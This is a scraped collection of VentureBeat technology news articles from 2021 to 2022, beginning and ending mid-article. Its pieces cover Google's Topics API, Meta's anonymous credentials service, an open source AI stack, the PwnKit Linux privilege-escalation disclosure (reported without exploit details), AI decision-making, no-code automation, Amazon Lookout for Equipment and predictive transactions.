advertisers The Topics API stands as a solution alongside the ADTech software market, which was valued at $16.27 billion in 2018 and is projected to reach $29.85 billion by 2026. While third-party cookies are Topics APIs main competitor, as they get phased out device or browser fingerprinting will become its main alternative. Many organizations use device fingerprinting to identify devices or browsers, and gather information about users. This includes browser version, operating system, active plugins, language, as well as how they browse through the site. While device fingerprinting is a useful technique for enterprises to identify users on new or old devices, to target them with relevant offers or services, the information it gathers on users is also quite invasive and extensive. Topics give advertisers and organizations actionable information on users so they can view the topics that users are interested in, but protects user privacy by preventing them from having direct access to browsing history, the websites they’ve visited, and their behavior on other sites. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,130
2,022
"Meta says its Anonymous Credentials Service (ACS) will help reduce data collection activities | VentureBeat"
"https://venturebeat.com/2022/03/30/meta-says-its-anonymous-credentials-service-acs-will-help-reduce-data-collection-activities"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Meta says its Anonymous Credentials Service (ACS) will help reduce data collection activities Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, Meta engineers delivered a talk as part of the Systems@Scale virtual event detailing the organization’s approach to data minimization and elaborated on an internal solution it’s developed called the Anonymous Credentials Service (ACS). Meta’s ACS is designed to enable it to authenticate users in a “de-identified manner,” permitting access to services without gathering any data that could be used to identify the subject’s identity. Under the ACS, a client contacts the server through an authentication channel and sends a token, which the server signs and sends back. Then the client uses an anonymous channel to submit data to the server and authenticates it using a modified form of the token rather than the user’s ID. This allows servers to authenticate clients without knowing what client a token belongs to. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The organization’s approach highlights a potential alternative for enterprises and technical decision makers who are looking at techniques for minimizing the amount of data they collect. The need to de-identify data Meta’s ACS comes as data privacy regulations mount up across the globe, and as the organization has come under fire under the GDPR for transatlantic data sharing, with the company recently announcing that it would pull Facebook and Instagram from Europe if the GDPR prevented sharing user data from the US to the EU. “We have absolutely no desire and no plans to withdraw from Europe, but the simple reality is that Meta, and many other businesses, organizations and services, rely on data transfers between the E.U. and the U.S. in order to operate global services,” a Meta spokesperson said. For all organizations doing business, there is a need to collect the minimum amount of data to prevent personally identifiable information from falling into the wrong hands. Meta’s development of the ACS provides a new technique that the organization can use to authenticate users and ensure the security of key services while decoupling their identities from personally identifiable information. “Collecting the minimum amount of data required to support our services – is one of our core principles at Meta as we continue developing new privacy enhancing technologies (PETs). We are constantly seeking ways to improve privacy and protect user data on our family of products,” said Meta Software Engineers Shiv Kushwah and Haozhi Xiong in the official blog post. The ACS provides a way to keep protected information private while ensuring that the organization has enough data to perform its critical tasks. “So, we leveraged the ‘anonymous credential’ collaboratively designed over the years between industry and academia, to create a core service called Anonymous Credentials Service (ACS). ACS is a highly available, multi-tenant service that allows clients to authenticate in a de-identified manner,” Kushwah and Xiong said. It enhances privacy and security while also being compute-conscious. ACS is one of the newest additions to our PETS portfolio and is currently in use across several high-volume use cases at Meta,” The trials and tribulations of data protection Meta’s engineering talk comes as the data protection market is in a state of growth, with the market anticipated to increase from $61 million in 2020 to reach $11 million by 2027 as the volume of data increases alongside government regulations implementing new data protection standards. Among social media companies there’s certainly a need for innovation regarding data protection, with Twitter recently incurring a €450,000 ($502,440.75 USD) fine from The Irish Data Protection Commission , following GDPR violations after a 2019 data breach. Likewise, TikTok has made costly mistakes regarding data management, when in July last year, the Dutch Data Protection Authority (DPA) imposed a fine of €750,000 ($837,198.75 USD) for violating the privacy of children for failing to offer the privacy statement in Dutch. Currently Meta is aiming to differentiate itself from other social media providers by developing a new solution for sharing data that will ensure data can be leveraged without exposing any personal information to regulatory liabilities and threat actors. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,131
2,021
"Open source AI stack is ready for its moment | VentureBeat"
"https://venturebeat.com/2021/04/27/open-source-ai-stack-is-ready-for-its-moment"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Open source AI stack is ready for its moment Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Open source stacks enabled software to eat the world. Now several innovative companies are working to build a similar open source software stack for AI development. Dan Jeffries was there when the LAMP stack kicked this off. LAMP is an acronym representing the key technologies first used in open source software development — Linux, Apache, MySQL, and PHP. These technologies were once hotly debated, but today they are so successful that the LAMP stack has become ubiquitous, invisible, and boring. AI, on the other hand, is hotter than ever. Much as the LAMP stack turned software development into a commodity and made it a bit boring, especially if you’re not a professional developer, a successful AI software stack should turn AI into a commodity — and make it a little boring too. That is precisely what Jeffries is setting out to do with the AI Infrastructure Alliance (AIIA). VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Innovation, and where it’s at Jeffries wears many hats. His main role, in theory at least, is chief technical evangelist at data science platform Pachyderm. Jeffries also describes himself as an author, futurist, engineer, systems architect, public speaker, and pro blogger. It’s the confluence of all those things that led him to start the AIIA. The AI Infrastructure Alliance’s mission is to bring together the tools data scientists and data engineers need to build a robust, scalable, end-to-end, enterprise artificial intelligence and machine learning (AI/ML) platform. This sounds like such an obvious goal — one that would be so beneficial to so many — you’d think somebody would have done it already. But asking why we’re not there yet is the first step toward actually getting there. Vendor lock-in is a reason, but not the only one. Vendor lock-in, after all, is becoming increasingly less relevant in a cloud-first, open source-first world, although technology business moats live on in different ways. Jeffries was surprised that he did not see an organization actually trying to capture the energy around AI activity, bring different companies together, and get their integrations teams talking to each other. “Every founder and every engineer I ended up talking to was very excited. I really didn’t have to work very hard to get people interested in the concept. They understood it intuitively, and they realized that the innovation is coming from these small to mid-sized companies,” Jeffries said. “They are getting funded now, and they’re up against giant, vertically integrated plays like SageMaker from Amazon. But I don’t think any of the innovation is coming from that space.” Having spent more than 11 years out of his 20-year career at Red Hat, Jeffries recalls how the proprietary software companies used to come up with all the ideas, and then open source would copy them “in a kind of OK way.” But over time, most of the innovation started flowing to open source and to the smaller companies’ projects, he said. An open source AI stack for the future The Amazons of the world have their place, as the cloud is where most AI workloads run. Big vertically integrated proprietary systems serve their own purpose, and they’re always going to make money. But the difference is Kubernetes and Docker don’t become Kubernetes and Docker if they only run on Google, Jeffries said. Innovation is going to come from a bunch of these companies working like little Lego pieces that we stack together, he added. That’s precisely what the AIIA is working on. So, when can we expect to have a LAMP stack for AI? In all likelihood, not very soon, which brings us to the other key reason this has not happened yet. Jeffries expects a LAMP stack, or a MEAN stack , for AI and ML to emerge in the next five to 10 years and to change over time. The LAMP stack itself is kind of passé now. In fact, the cool dev kids these days are all about the MEAN stack, which includes MongoDB, ExpressJS, AngularJS, and NodeJS. Jeffries has described these as canonical stacks , which arise with greater and greater frequency “as organizations look to solve the same super challenging problems.” The kind of momentum that happened with LAMP will occur in the ML space, Jeffries suggested. But he warned against believing that anyone has an end-to-end ML system at this point. This can’t be true because the sector is moving too fast. The space itself and the problems to solve are shifting as the software is being created. That makes sense, but then the question is — what exactly is the AIIA doing at this point? And what does the fact that its ranks include some of the most innovative startups in this space, alongside the likes of Canonical and NewRelic , actually mean? Now some innovators are working to build an open source stack specifically for AI. Enthusiasm is good, but there’s a gap between saying “Hey, that sounds like a good idea, sign me up” and actually coming up with a plan to make it happen. So how are the AIIA and Jeffries going to pull it off? As a writer, Jeffries used George R.R. Martin’s metaphor of gardeners and architects to explain how he sees the evolution of AIIA over time. Architects plan and execute; gardeners plant seeds and nurture them. Jeffries identifies as a gardener and sees a lot of the people in the organization as gardeners. He thinks it’s necessary at this phase and envisions the AIIA evolving over time. Right now, the idea is to get people talking at a lot of different levels, rather than working in their own little silos. Micro-alliances are fair game though: “If you look at 30 logos on the website, you’re not going to build an ML stack with all 30 of those things,” Jeffries said. A concern is the fact that building bridges, and communities, takes time and energy. But Jeffries is enthusiastic about the prospect of helping shape what he sees as the AI revolution, is inspired by the open source ethos, and has the leeway from Pachyderm to run with his ideas. Work, boring work, and AI That seems to be what he’s doing with AIIA. Currently, he’s working on turning the AIIA into a foundation, and he’s also in talks with the Linux Foundation. The goal is to get to the point of bringing in some revenue. Jeffries is working on finances and a governance structure for the AIIA. “You get people who are just firmly focused on this, and it becomes a balance of volunteer efforts and people paid to work on different aspects. The next step really is a lot of logistical work — the boring stuff,” Jeffries said. Another metaphor Jeffries uses is that of a strategic board game, where you have to think about everything that can go wrong in advance — a bit like a reverse architect. Inevitably, there is going to be at least some amount of boring work, and somebody needs to do it. But for Jeffries, it’s all worth it. “When I look at AI at this point, I think very few people understand just how important it’s going to be. And I think they have an inkling of it, but it’s usually a fear-based kind of thing,” he said. “They don’t understand fully that in the future, there are two kinds of jobs: one done by AI, and one assisted by AI.” Isn’t it actually three types of jobs, as someone has to build the AI ? The people building AI are going to be assisted by AI, so that falls into the second category, Jeffries said. There’s a creative aspect, as someone has to come up with an algorithm. But things like hyper-parameter tuning are already being automated, he added. Jeffries waxed poetic about how “the boring stuff” will be done by AI so people can move up the stack and do more interesting things. Even the creative parts will be a co-creative process between people and AI, in Jeffries’ view. As for the “AI destroys all the jobs” narrative, we’ve heard this one before, but the previous industrial revolutions worked out fine, Jeffries argued. Same goes for the argument that the pace of innovation is so rapid that we don’t have time to create jobs to replace those that are going to be displaced. What even an AI optimist like Jeffries can’t easily dismiss is the fact that innovation may not necessarily be coming from the Big Tech companies, but this is where the data is. This creates a reinforcement loop, where more data begets more AI leading to more data, and so on. Jeffries acknowledges data as a legitimate moat. But he believes ML is progressing in ways that make the dependency on data less vital, such as few-shot learning and transfer learning. This, and the fact that the amount of data the world is creating is not getting any smaller, may spur change. What seems inevitable, however, is the need to do lots of work, often boring work, to be able to chase dreams of creativity. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,132
2,022
"Linux vulnerability can be 'easily exploited' for local privilege escalation, researchers say | VentureBeat"
"https://venturebeat.com/2022/01/25/linux-vulnerability-can-be-easily-exploited-for-local-privilege-escalation-researchers-say"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Linux vulnerability can be ‘easily exploited’ for local privilege escalation, researchers say Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Let the OSS Enterprise newsletter guide your open source journey! Sign up here. A newly disclosed vulnerability in a widely installed Linux program can be easily exploited for local privilege escalation, researchers from cyber firm Qualys said today. The memory corruption vulnerability (CVE-2021-4034)—which affects polkit’s pkexec—is not remotely exploitable. However, it can be “quickly” exploited to acquire root privileges, the researchers said in a blog post. “This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration,” the Qualys researchers said in the post. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! In Unix-like operating systems, polkit (formerly known as PolicyKit) is used to control system-wide privileges. Polkit’s pkexec is a program that enables an authorized user to execute commands as a different user. Most Linux distributions affected All versions of pkexec are affected by the vulnerability, and the program is “installed by default on every major Linux distribution,” the Qualys researchers said. The first version of pkexec debuted in May 2009, meaning that the vulnerability—which the researchers dubbed “PwnKit”—has been “hiding in plain sight for 12+ years,” according to the blog post. The researchers said that they’ve “been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu, Debian, Fedora, and CentOS.” “Other Linux distributions are likely vulnerable and probably exploitable,” the researchers said. Without a doubt, “any vulnerability that gives root access on a Linux system is bad,” said Yaniv Bar-Dayan, cofounder and CEO at Vulcan Cyber, in an email comment. However, “this vulnerability is a local exploit, which mitigates some risk,” he noted. Disclosure The vulnerability was discovered by the Qualys researchers in November. They reported it to Red Hat, leading up to a coordinated announcement with vendor and open-source distributions today. In the blog post, Qualys researchers said they expect vendors to provide patches for the vulnerability “in the short term.” As of this writing, the Common Vulnerabilities and Exposures (CVE) website did not yet have a listing for CVE-2021-4034. The Qualys researchers said they don’t plan to post exploit code for the flaw. But “given how easy it is to exploit the vulnerability, we anticipate public exploits to become available within a few days,” the researchers said in the blog post. Spotlight on open source The disclosure comes at a time of particularly high attention on software vulnerabilities, following the reveal of a critical remote code execution flaw in Apache Log4j, a widely used Java logging component, in December. Thanks in large part to the massive response effort from the security community, there have been few cyberattacks of consequence leveraging the Log4j vulnerability, researchers at Sophos said Monday. Like the Log4j vulnerability, the Linux flaw disclosed by Qualys today affects widely used open source systems—making this new vulnerability a “big deal” for the industry, said Bud Broomhead, CEO at Viakoo. “A single open source vulnerability can be present in multiple systems—including proprietary ones—which then requires multiple manufacturers to separately develop, test, and distribute a patch,” Broomhead said in an email comment. “For both the manufacturer, and end user, this adds enormous time and complexity to implementing a security fix for a known vulnerability.” Threat actors, meanwhile, “are betting on some manufacturers being slow in releasing fixes and some end users being slow in updating their devices,” he said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,133
2,022
"How far should AI’s decision-making authority go? | VentureBeat"
"https://venturebeat.com/2022/03/14/how-far-should-ais-decision-making-authority-go"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages How far should AI’s decision-making authority go? Share on Facebook Share on X Share on LinkedIn A pair of robots dressed like an angel and a devil Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Perhaps the leading value proposition for artificial intelligence (AI) is its propensity to help humans make decisions. With the right data and the right analytics, people can choose a course of action based on solid information, not hunches or guesses, and this is expected to bring dramatic improvements to the business model. Elsewhere, however, AI won’t focus on the choices that humans must make, but the ones it will make for itself. In the realm of automation, in particular, AI will be tasked with broad decision-making capabilities — all data-driven, of course — to streamline data flows, improve manufacturing processes, direct traffic and perform a wide range of other functions. This begs the question, where is the line between what AI should decide and what is best left for humans? Being careful with autonomous AI Implementing autonomous AI across the full scope of the enterprise data ecosystem – from the data center to the cloud to the edge to connected devices – will require careful coordination between a number of emerging data initiatives. Alan Young, chief product officer at automation firm InRule Technology , recently highlighted the intersection of machine learning (ML), decision automation and process automation and how it will drive better business results. With ML providing the probabilistic decisioning logic and both decision and process automation contributing consistent, orchestrated rules-based governance of operations and behavior, processes gain the ability to act on real-time, dynamic inputs and values without the need for constant, direct human oversight. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! With this framework in hand, Young says organizations can not only produce more successful outcomes from its data process, but do so at scale rapidly and consistently. Already, this is evolving beyond a mere competitive advantage to an operational necessity by allowing organizations to detect and respond to both opportunities and threats as they emerge. Still, there is an element of the slippery slope to all of this as AI becomes more infused into the digital universe. As Talend’s Julinda Stefa noted recently, allowing AI to choose your playlist or manage your die-cutting process is one thing, but off-loading decisions on stock trades, healthcare choices and other critical activities is quite another. Unless and until AI is empowered with some degree of humanity, businesses and people should tread carefully as to what it should and should not do. Fortunately, the human touch can be added to AI using three basic techniques: Ensure data quality – not just to detect errors but to ensure data is timely and relevant. Make data accessible to all – users should have complete visibility into the data used to train models, and that data should be comprehensive. Prioritize security and compliance – security and privacy policies should be reliably documented, regularly updated and consistently enforced. Clearly, rigorous monitoring of AI decision-making will have to be a top-priority going forward, even if the model is aimed at rote, routine tasks. Michael Ross , senior vice president of retail data science at EDITED, offers an example of a retail bot empowered to mark down prices under certain conditions. If, say, at the start of swimwear season, sales of a particular line haven’t hit their targets due to unseasonably cold temperatures, an AI model may execute its logic and put the entire stock on clearance, losing millions of dollars when normal buying patterns resume. The best way to prevent this is to keep humans in the decision-making loop so they can prevent mistakes like these, or correct them quickly if they do happen. What is intelligent automation? What we’re seeing in the integration of AI and automation is the emergence of a new class of platforms called Intelligent Process Automation. In Cognizant’s view , the incorporation of tools like robotics process automation, cognitive technologies, optical character recognition and natural language processing produces a digital Swiss army knife that allows the enterprise to manage its exponential growth, provide clear and consistent results and accelerate business outcomes. Along with this new technology, however, organizations will have to re-orient themselves to the new operational paradigm by addressing gaps in the workforce skillset and overcoming cultural resistance to change. It’s important to remember that intelligent automation should not become an excuse to put systems and processes on autopilot. Even as the knowledge workforce evolves from an operational resource to a strategic one, someone still has to keep an eye on how the business is running. And while technology may become empowered to make more, and more important, decisions, it still must answer to someone for its actions – if only to let the good decisions multiple while the bad ones are neutralized. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,134
2,021
"Next Matter brings no-code process automation to the U.S. | VentureBeat"
"https://venturebeat.com/2021/02/04/next-matter-brings-no-code-process-automation-to-the-u-s"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Next Matter brings no-code process automation to the U.S. Share on Facebook Share on X Share on LinkedIn Next Matter Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Next Matter , a no-code business process automation platform based in Germany, has announced plans to enter the U.S. market with the backing of a fresh $4 million in seed funding. Founded out of Berlin in 2018, Next Matter offers a rules-based drag-and-drop platform to help operations teams ditch spreadsheets, emails, and chat apps by building processes that do much of the heavy lifting for them. To do so, Next Matter integrates with myriad third-party enterprise tools, such as Salesforce, HubSpot, Slack, and Zapier, to bridge the interlaces between people, teams, customers, suppliers, and systems that “operations managers struggle with every day,” according to Next Matter CEO and founder Jan Hugenroth. “Instead of the countless emails, calls, chats, and spreadsheets required to tell people, teams, customers, suppliers, and systems step by step what to do and when, Next Matter automatically advances operations processes and notifies everyone involved of the work they need to do from start to finish,” Hugenroth told VentureBeat. “No more going back and forth via Slack and email because everyone on every team has what they need when they need it automatically.” Next Matter can be used to build processes for just about any scenario, with a drag-and-drop interface that allows users to stipulate conditions, decision steps, parallel steps, and more. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Above: Next Matter: Building a procurement process An example of how operations teams might use Next Matter could involve a catering business such as meal-kit giant HelloFresh, which Next Matter counts as a client. If one of HelloFresh’s business clients needs a vending machine repaired, HelloFresh can set up a workflow so its customer support team files a repair request in their CRM. This could automatically trigger a notification for the machine operations team, which may review it and request more details. Then the field service team responsible for repairs can be automatically notified to schedule a suitable time to visit the premises. Once the repair is booked, Next Matter can automatically generate a slot in the calendar, with necessary details, and send a confirmation to the customer. Other steps in the repair process, including reminders, report filings, and CRM record updates can all be configured so that each step is largely automated, sidestepping countless manual tickets, back-and-forth messages, meetings, and so on. There are many other process automation tools out there already, such as Zapier for system integrations and Asana for workflow automation , but Hugenroth considers Next Matter the only end-to-end option for operations teams that covers all the required functionalities. “Next Matter allows operations managers to skip the learning curve of other workflow tools and build reliable automation in a radically simplified way, with no prior experience necessary,” he said. “Because the platform was designed for non-technical business users, operations teams spend less time on training, configuration, and setup and more time getting real work done, with ease and reliability.” Next Matter also fits into a broader no-code and low-code trend that spans everything from web development to web testing and seeks to reduce repetitive manual tasks and improve efficiency. The company’s $4 million seed round was led by Blue Yard Capital, with participation from Crane Venture Partners, among other angel investors. As the company looks to expand its scope beyond Europe, it’s now looking to the U.S. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,135
2,021
"Amazon launches ML-powered maintenance tool Lookout for Equipment in general availability | VentureBeat"
"https://venturebeat.com/2021/04/08/amazon-launches-ml-powered-maintenance-tool-lookout-for-equipment-in-general-availability"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Amazon launches ML-powered maintenance tool Lookout for Equipment in general availability Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Amazon today announced the general availability of Lookout for Equipment , a service that uses machine learning to help customers perform maintenance on equipment in their facilities. Launched in preview last year during Amazon Web Services (AWS) re:Invent 2020, Lookout for Equipment ingests sensor data from a customer’s industrial equipment and then trains a model to predict early warning signs of machine failure or suboptimal performance. Predictive maintenance technologies have been used for decades in jet engines and gas turbines, and companies like GE Digital’s Predix and Petasense offer Wi-Fi-enabled, cloud- and AI-driven sensors. According to a recent report by analysts at Markets and Markets, predictive factory maintenance could be worth $12.3 billion by 2025. Startups like Augury are vying for a slice of the segment, beyond Amazon. With Lookout for Equipment, industrial customers can build a predictive maintenance solution for a single facility or multiple facilities. To get started, companies upload their sensor data — like pressure, flow rate, RPMs, temperature, and power — to Amazon Simple Storage Service (S3) and provide the relevant S3 bucket location to Lookout for Equipment. The service will automatically sift through the data, look for patterns, and build a model that’s tailored to the customer’s operating environment. Lookout for Equipment will then use the model to analyze incoming sensor data and identify early warning signs of machine failure or malfunction. For each alert, Lookout for Equipment will specify which sensors are indicating an issue and measure the magnitude of its impact on the detected event. For example, if Lookout for Equipment spotted an problem on a pump with 50 sensors, the service could show which five sensors indicate an issue on a specific motor and relate that issue to the motor power current and temperature. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! “Many industrial and manufacturing companies have heavily invested in physical sensors and other technology with the aim of improving the maintenance of their equipment. But even with this gear in place, companies are not in a position to deploy machine learning models on top of the reams of data due to a lack of resources and the scarcity of data scientists,” VP of machine learning at AWS Swami Sivasubramanian said in a press release. “Today, we’re excited to announce the general availability of Amazon Lookout for Equipment, a new service that enables customers to benefit from custom machine learning models that are built for their specific environment to quickly and easily identify abnormal machine behavior — so that they can take action to avoid the impact and expense of equipment downtime.” Lookout for Equipment is available via the AWS console as well through supporting partners in the AWS Partner Network. It launches today in US East (N. Virginia), EU (Ireland), and Asia Pacific (Seoul) server regions, with availability in additional regions in the coming months. The launch of Lookout for Equipment follows the general availability of Lookout for Metrics, a fully managed service that uses machine learning to monitor key factors impacting the health of enterprises. Both products are complemented by Amazon Monitron, an end-to-end equipment monitoring system to enable predictive maintenance with sensors, a gateway, an AWS cloud instance, and a mobile app. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,136
2,021
"Predictive transactions are the next big tech revolution | VentureBeat"
"https://venturebeat.com/2021/09/26/predictive-transactions-are-the-next-big-tech-revolution"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest Predictive transactions are the next big tech revolution Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. In recent years, data has been the world’s hottest commodity. Money has gravitated towards companies that collect it, companies that analyse it, and the data infrastructure companies that provide the digital plumbing that makes it all possible. In the last five years, data infrastructure startups alone have raised over $8 billion of venture capital, at an aggregate value of $35 billion. We know the names of the biggest companies in the space; they include Databricks , Snowflake , Confluent , MongoDB , Segment , Looker , and Oracle. But what are they actually for? VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Most investors will talk about how data can, in theory, be used to derive trends. Others may talk about how data will change the world, without filling in the blanks on how. I don’t disagree. I’ve worked and invested in data companies for my entire career. But I think they are missing something big. There is a powerful disruption coming; perhaps, the most powerful since computerized transaction processing was invented in 1964. Predictive transaction processing is about to upend the model of the last 57 years of computing and change the way we live, work, shop, and entertain. For businesses to remain relevant and competitive, they not only need to be able to predict customer behavior and preferences, they also need to rely on predictive transactions to automate most of their business interactions, i.e., taking automated actions while selling to or servicing 